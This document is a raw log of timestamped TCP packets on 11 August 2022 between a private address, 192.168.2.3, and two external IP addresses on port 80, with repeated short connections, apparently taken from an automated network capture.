Aug 11, 2022 06:42:55.515017033 CEST	49789	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:55.515289068 CEST	49789	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:55.532382011 CEST	80	49789	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:56.617532969 CEST	49790	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:56.634504080 CEST	80	49790	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:56.634614944 CEST	49790	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:56.651534081 CEST	49790	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:56.668478966 CEST	80	49790	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:56.668574095 CEST	49790	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:56.685523987 CEST	80	49790	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:56.784835100 CEST	80	49790	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:56.785022020 CEST	49790	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:56.785505056 CEST	80	49790	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:56.785588026 CEST	49790	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:42:56.802026987 CEST	80	49790	188.114.97.3	192.168.2.3
Aug 11, 2022 06:42:58.079230070 CEST	49791	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:58.096255064 CEST	80	49791	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:58.096395016 CEST	49791	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:58.117985964 CEST	49791	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:58.134943008 CEST	80	49791	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:58.135077000 CEST	49791	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:58.151957035 CEST	80	49791	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:58.219897032 CEST	80	49791	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:58.219980955 CEST	80	49791	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:58.220238924 CEST	49791	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:58.221627951 CEST	49791	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:58.238585949 CEST	80	49791	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:59.374720097 CEST	49792	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:59.391760111 CEST	80	49792	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:59.391891956 CEST	49792	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:59.404300928 CEST	49792	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:59.421365023 CEST	80	49792	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:59.421533108 CEST	49792	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:59.438479900 CEST	80	49792	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:59.501753092 CEST	80	49792	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:59.501789093 CEST	80	49792	188.114.96.3	192.168.2.3
Aug 11, 2022 06:42:59.501888990 CEST	49792	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:59.501944065 CEST	49792	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:42:59.518934011 CEST	80	49792	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:00.625570059 CEST	49793	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:00.642472029 CEST	80	49793	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:00.642723083 CEST	49793	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:00.645450115 CEST	49793	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:00.662414074 CEST	80	49793	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:00.662642956 CEST	49793	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:00.679544926 CEST	80	49793	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:00.737303972 CEST	80	49793	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:00.737401962 CEST	80	49793	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:00.737521887 CEST	49793	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:00.737778902 CEST	49793	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:00.754390955 CEST	80	49793	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:01.921001911 CEST	49794	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:01.937931061 CEST	80	49794	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:01.938069105 CEST	49794	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:01.964847088 CEST	49794	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:01.981662989 CEST	80	49794	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:01.981728077 CEST	49794	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:01.998498917 CEST	80	49794	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:02.082334042 CEST	80	49794	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:02.082389116 CEST	80	49794	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:02.082448959 CEST	49794	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:02.082485914 CEST	49794	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:02.099236012 CEST	80	49794	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:02.976502895 CEST	49795	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:02.993458033 CEST	80	49795	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:02.993901014 CEST	49795	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:03.020333052 CEST	49795	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:03.037249088 CEST	80	49795	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:03.038050890 CEST	49795	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:03.054934025 CEST	80	49795	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:03.112765074 CEST	80	49795	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:03.112881899 CEST	80	49795	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:03.112937927 CEST	49795	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:03.112987041 CEST	49795	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:03.129784107 CEST	80	49795	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:04.143903017 CEST	49796	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:04.160830021 CEST	80	49796	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:04.162079096 CEST	49796	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:04.193279028 CEST	49796	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:04.210311890 CEST	80	49796	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:04.210558891 CEST	49796	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:04.227607012 CEST	80	49796	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:04.301268101 CEST	80	49796	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:04.301337004 CEST	80	49796	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:04.301449060 CEST	49796	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:04.301486015 CEST	49796	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:04.318429947 CEST	80	49796	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:05.327538013 CEST	49797	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:05.344523907 CEST	80	49797	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:05.344647884 CEST	49797	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:05.379364967 CEST	49797	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:05.396171093 CEST	80	49797	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:05.396261930 CEST	49797	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:05.413058996 CEST	80	49797	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:05.476572037 CEST	80	49797	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:05.476780891 CEST	49797	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:05.494744062 CEST	80	49797	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:05.698714972 CEST	80	49797	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:05.698890924 CEST	49797	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:06.517255068 CEST	49798	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:06.534354925 CEST	80	49798	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:06.534487963 CEST	49798	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:06.576802969 CEST	49798	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:06.594005108 CEST	80	49798	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:06.594121933 CEST	49798	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:06.611279964 CEST	80	49798	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:06.684562922 CEST	80	49798	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:06.684685946 CEST	49798	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:06.701719999 CEST	80	49798	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:06.910015106 CEST	80	49798	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:06.910379887 CEST	49798	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:07.993128061 CEST	49800	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:08.010071993 CEST	80	49800	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:08.010215998 CEST	49800	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:08.046751976 CEST	49800	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:08.063676119 CEST	80	49800	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:08.063824892 CEST	49800	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:08.080709934 CEST	80	49800	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:08.138412952 CEST	80	49800	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:08.138458014 CEST	80	49800	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:08.138525963 CEST	49800	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:08.139596939 CEST	49800	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:08.155374050 CEST	80	49800	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:09.230854034 CEST	49805	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:09.247755051 CEST	80	49805	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:09.247904062 CEST	49805	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:09.287220955 CEST	49805	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:09.304017067 CEST	80	49805	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:09.304119110 CEST	49805	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:09.320909977 CEST	80	49805	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:09.410331011 CEST	80	49805	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:09.410437107 CEST	49805	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:09.410484076 CEST	80	49805	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:09.410547018 CEST	49805	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:09.427270889 CEST	80	49805	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:10.606982946 CEST	49811	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:10.623784065 CEST	80	49811	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:10.624655008 CEST	49811	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:10.662100077 CEST	49811	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:10.679048061 CEST	80	49811	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:10.680753946 CEST	49811	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:10.697815895 CEST	80	49811	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:10.766151905 CEST	80	49811	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:10.766200066 CEST	80	49811	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:10.766284943 CEST	49811	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:10.767030954 CEST	49811	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:10.785882950 CEST	80	49811	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:11.878447056 CEST	49817	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:11.895586014 CEST	80	49817	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:11.895734072 CEST	49817	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:11.901227951 CEST	49817	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:11.918093920 CEST	80	49817	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:11.918181896 CEST	49817	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:11.935200930 CEST	80	49817	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:12.004159927 CEST	80	49817	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:12.004203081 CEST	80	49817	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:12.004329920 CEST	49817	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:12.006226063 CEST	49817	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:12.023083925 CEST	80	49817	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:13.301457882 CEST	49823	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:13.318450928 CEST	80	49823	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:13.318589926 CEST	49823	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:13.321407080 CEST	49823	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:13.338340998 CEST	80	49823	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:13.338433981 CEST	49823	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:13.355273962 CEST	80	49823	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:13.432349920 CEST	80	49823	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:13.432446003 CEST	80	49823	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:13.433849096 CEST	49823	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:13.440321922 CEST	49823	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:13.457145929 CEST	80	49823	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:14.483346939 CEST	49828	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:14.500252962 CEST	80	49828	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:14.500360966 CEST	49828	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:14.503252029 CEST	49828	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:14.520194054 CEST	80	49828	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:14.520320892 CEST	49828	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:14.537278891 CEST	80	49828	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:14.600589037 CEST	80	49828	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:14.600610971 CEST	80	49828	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:14.600728989 CEST	49828	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:14.600775003 CEST	49828	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:14.617567062 CEST	80	49828	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:16.785131931 CEST	49830	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:16.802120924 CEST	80	49830	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:16.802244902 CEST	49830	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:16.837785959 CEST	49830	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:16.854752064 CEST	80	49830	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:16.854964972 CEST	49830	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:16.871949911 CEST	80	49830	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:16.930457115 CEST	80	49830	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:16.930565119 CEST	80	49830	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:16.930645943 CEST	49830	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:16.930686951 CEST	49830	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:16.947599888 CEST	80	49830	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:19.724582911 CEST	49832	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:19.741693974 CEST	80	49832	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:19.742000103 CEST	49832	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:19.747801065 CEST	49832	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:19.764846087 CEST	80	49832	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:19.767625093 CEST	49832	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:19.784897089 CEST	80	49832	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:19.855670929 CEST	80	49832	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:19.855727911 CEST	80	49832	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:19.855834007 CEST	49832	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:19.855896950 CEST	49832	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:19.873055935 CEST	80	49832	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:24.402185917 CEST	49838	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:24.419157028 CEST	80	49838	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:24.419255018 CEST	49838	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:24.421880960 CEST	49838	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:24.438740969 CEST	80	49838	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:24.438859940 CEST	49838	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:24.455761909 CEST	80	49838	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:24.509193897 CEST	80	49838	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:24.509238958 CEST	80	49838	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:24.509382963 CEST	49838	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:24.509434938 CEST	49838	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:24.526418924 CEST	80	49838	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:28.483928919 CEST	49840	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:28.501153946 CEST	80	49840	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:28.501379967 CEST	49840	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:28.505356073 CEST	49840	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:28.522377014 CEST	80	49840	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:28.522589922 CEST	49840	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:28.539570093 CEST	80	49840	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:28.641503096 CEST	80	49840	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:28.641572952 CEST	80	49840	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:28.641741991 CEST	49840	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:28.641791105 CEST	49840	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:28.658684015 CEST	80	49840	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:31.903445959 CEST	49843	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:31.920433044 CEST	80	49843	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:31.920559883 CEST	49843	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:31.924021959 CEST	49843	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:31.941020012 CEST	80	49843	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:31.941167116 CEST	49843	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:31.958272934 CEST	80	49843	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:32.031413078 CEST	80	49843	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:32.031461000 CEST	80	49843	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:32.031552076 CEST	49843	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:32.032409906 CEST	49843	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:32.049395084 CEST	80	49843	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:33.859739065 CEST	49850	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:33.876641035 CEST	80	49850	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:33.876796961 CEST	49850	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:33.879384995 CEST	49850	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:33.896298885 CEST	80	49850	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:33.896676064 CEST	49850	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:33.913620949 CEST	80	49850	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:33.985601902 CEST	80	49850	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:33.985670090 CEST	80	49850	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:33.985739946 CEST	49850	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:33.985814095 CEST	49850	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:34.002648115 CEST	80	49850	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:38.337682009 CEST	49852	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:38.354506969 CEST	80	49852	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:38.354835033 CEST	49852	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:38.361572981 CEST	49852	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:38.378417969 CEST	80	49852	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:38.378686905 CEST	49852	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:38.395507097 CEST	80	49852	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:38.459871054 CEST	80	49852	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:38.459916115 CEST	80	49852	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:38.460036039 CEST	49852	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:38.460273981 CEST	49852	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:38.477176905 CEST	80	49852	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:40.640290022 CEST	49853	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:40.657299042 CEST	80	49853	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:40.657532930 CEST	49853	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:40.660156012 CEST	49853	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:40.677062035 CEST	80	49853	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:40.677138090 CEST	49853	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:40.693958044 CEST	80	49853	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:40.763823032 CEST	80	49853	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:40.763860941 CEST	80	49853	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:40.763967037 CEST	49853	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:40.764002085 CEST	49853	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:40.781193972 CEST	80	49853	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:42.739273071 CEST	49859	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:42.756145000 CEST	80	49859	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:42.756273031 CEST	49859	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:42.759258032 CEST	49859	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:42.776163101 CEST	80	49859	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:42.776278019 CEST	49859	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:42.793277025 CEST	80	49859	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:42.876914978 CEST	80	49859	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:42.877078056 CEST	49859	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:42.877350092 CEST	80	49859	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:42.881366014 CEST	49859	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:42.893987894 CEST	80	49859	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:45.799541950 CEST	49867	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:45.816531897 CEST	80	49867	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:45.816725969 CEST	49867	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:45.824251890 CEST	49867	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:45.841160059 CEST	80	49867	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:45.841337919 CEST	49867	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:45.858192921 CEST	80	49867	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:45.919315100 CEST	80	49867	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:45.919399023 CEST	80	49867	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:45.919538021 CEST	49867	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:45.919596910 CEST	49867	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:45.936702967 CEST	80	49867	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:47.314696074 CEST	49875	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:47.331473112 CEST	80	49875	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:47.331583977 CEST	49875	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:47.334573030 CEST	49875	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:47.351403952 CEST	80	49875	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:47.351474047 CEST	49875	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:47.368793011 CEST	80	49875	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:47.447091103 CEST	80	49875	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:47.447221994 CEST	80	49875	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:47.447230101 CEST	49875	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:47.447316885 CEST	49875	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:47.464535952 CEST	80	49875	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:48.383508921 CEST	49879	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:48.400394917 CEST	80	49879	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:48.400484085 CEST	49879	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:48.403290033 CEST	49879	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:48.420128107 CEST	80	49879	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:48.420222044 CEST	49879	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:48.437043905 CEST	80	49879	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:48.498898983 CEST	80	49879	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:48.499011040 CEST	49879	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:48.499054909 CEST	80	49879	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:48.499110937 CEST	49879	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:48.516505957 CEST	80	49879	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:49.995342970 CEST	49881	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:50.012300014 CEST	80	49881	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:50.012435913 CEST	49881	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:50.015660048 CEST	49881	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:50.032531977 CEST	80	49881	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:50.032645941 CEST	49881	80	192.168.2.3	188.114.97.3
